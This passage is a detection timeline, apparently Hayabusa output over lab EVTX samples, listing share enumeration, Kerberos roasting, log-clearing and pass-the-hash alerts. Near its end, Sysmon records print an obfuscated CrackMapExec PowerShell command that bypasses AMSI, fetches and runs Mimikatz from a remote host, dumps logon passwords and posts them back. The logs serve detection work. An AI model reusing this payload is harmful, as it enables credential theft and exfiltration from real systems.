+09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f96be,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 
0x3902ac4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df84d08,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d352ca,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13fa915,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x87371f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share 
Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x3902ff1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x57d35acf,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | 
Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 
0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 
0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: 192.168.1.100 | LID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 
+2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer: | IP Addr: 192.168.1.200 | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 
18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" 
-JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108
G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: 
SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A5
8G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | 
